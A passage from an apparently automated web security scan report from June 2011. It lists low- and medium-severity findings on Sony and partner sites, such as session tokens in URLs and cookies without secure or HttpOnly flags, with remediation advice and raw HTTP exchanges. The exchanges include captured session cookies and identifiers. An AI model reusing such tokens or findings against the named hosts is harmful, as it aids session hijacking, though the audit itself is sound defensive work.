Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:25 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/
Content-Length: 46207

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<title>Sony Parts and Accessories - Home</title>
<meta http-equiv="
...[SNIP]...

3.2. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sonyelectronicssupportus.112.2o7.net
Path:	/b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/
Location: https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:27 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close

3.3. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sonysscom.112.2o7.net
Path:	/b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/
Location: https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:28 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain
Connection: close

4. Session token in URL previous next
There are 3 instances of this issue:

http://sales.liveperson.net/hc/71737897/
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

4.1. http://sales.liveperson.net/hc/71737897/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hc/71737897/

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sales.liveperson.net/hc/71737897/?&visitor=16101514677756&msessionkey=4916265021794629949&site=71737897&cmd=mTagStartPage&lpCallId=641238012350-103325378382&protV=20&lpjson=1&page=http%3A//www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&id=4900462531&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sonystyle-sales-general-english&activePlugin=none&cobrowse=true&PV%21unit=sonystyle-sales-general&PV%21visitorActive=1&SV%21language=english&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics

Request

GET /hc/71737897/?&visitor=16101514677756&msessionkey=4916265021794629949&site=71737897&cmd=mTagStartPage&lpCallId=641238012350-103325378382&protV=20&lpjson=1&page=http%3A//www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&id=4900462531&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sonystyle-sales-general-english&activePlugin=none&cobrowse=true&PV%21unit=sonystyle-sales-general&PV%21visitorActive=1&SV%21language=english&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:58:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 14:58:34 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"641238012350-103325378382","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

4.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://servicesales.sel.sony.com
Path:	/ecom/accessories/web/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

http://servicesales.sel.sony.com/ecom/accessories/web/trackOrder.do?operation=init&sessionId=hzt8DTIMlpyDNOhXRLF_ba5

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.3. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.websitealive5.com
Path:	/4405/operator/guest/gDefault_v2.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=

Request

GET /4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion= HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: http://www.websitealive5.com/4405/rRouter.asp?groupid=4405&websiteid=150&departmentid=5101&dl=http%3A//www.omnitechsupport.com/about.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

5. Cookie scoped to parent domain previous next
There are 8 instances of this issue:

http://www.opensource.org/licenses/mit-license.php
http://solutions.liveperson.com/ref/lppb.asp
http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0
https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

5.1. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

5.2. http://solutions.liveperson.com/ref/lppb.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://solutions.liveperson.com
Path:	/ref/lppb.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 23 Jun 2011 15:19:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQCBBCCB=EODHGDPDEDEKKABJJNKILEHB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

5.3. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sonyelectronicssupportus.112.2o7.net
Path:	/b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597E[CE]; Expires=Tue, 21 Jun 2016 15:19:26 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597E[CE]; Expires=Tue, 21 Jun 2016 15:19:26 GMT; Domain=.2o7.net; Path=/
Location: http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:26 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close

5.4. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sonyelectronicssupportus.112.2o7.net
Path:	/b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

5.5. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sonysscom.112.2o7.net
Path:	/b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.6. http://www.facebook.com/sonyelectronics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sonyelectronics

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
lsd=rLE1G; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...

5.7. http://www.flickr.com/groups/sonycameraclub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/groups/sonycameraclub

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>

       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

5.8. http://www.flickr.com/groups/sonycameraclub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/groups/sonycameraclub/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>

       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...

6. Cookie without HttpOnly flag set previous next
There are 30 instances of this issue:

http://security.symantec.com/default.asp
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
http://solutions.liveperson.com/ref/lppb.asp
http://sony.storagesupport.com/
http://www.docs.sony.com/reflib/docget.asp
http://www.docs.sony.com/startchat.asp
http://www.opensource.org/licenses/mit-license.php
http://www.sonycreativesoftware.com/
http://sales.liveperson.net/hc/71737897/
http://sony.tcliveus.com/i
http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0
https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.omnitechsupport.com/sony/index.php
http://www.sony.com/
http://www.sony.com/index.php
http://www.sony.com/storagemedia
http://www.sonystyle.com/
http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/ReturnProductInfo
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYRedirectURLControllerCmd
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYWishListDisplay
http://www.us.playstation.com/
http://www.us.playstation.com/Support

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://security.symantec.com/default.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://security.symantec.com
Path:	/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACBQSBBB=ECNBPACEOEDIAKNNLHFILIEL; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: sscv6/default.asp?langid=ie&venid=sym
Content-Length: 162
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBQSBBB=ECNBPACEOEDIAKNNLHFILIEL; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="sscv6/default.asp?langid=ie&venid=sym">here</a>.</body>

6.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://servicesales.sel.sony.com
Path:	/ecom/accessories/web/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.3. http://solutions.liveperson.com/ref/lppb.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://solutions.liveperson.com
Path:	/ref/lppb.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQQCBBCCB=EODHGDPDEDEKKABJJNKILEHB; path=/
visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.4. http://sony.storagesupport.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sony.storagesupport.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS07abab826d851e77aee85522c6254c88=pjlp1vcvskl9vjmc6g84i02ts4; path=/; domain=.sony.storagesupport.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sony.storagesupport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:26 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS07abab826d851e77aee85522c6254c88=pjlp1vcvskl9vjmc6g84i02ts4; path=/; domain=.sony.storagesupport.com
Last-Modified: Thu, 23 Jun 2011 12:19:52 GMT
ETag: "d12054ab983693ed6c320fe9a9750c64"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8967

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Sony Storage Support
...[SNIP]...

6.5. http://www.docs.sony.com/reflib/docget.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.docs.sony.com
Path:	/reflib/docget.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQSTSQSCR=PFCCABKBJDOBFNKNEPFEAPOM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reflib/docget.asp HTTP/1.1
Host: www.docs.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

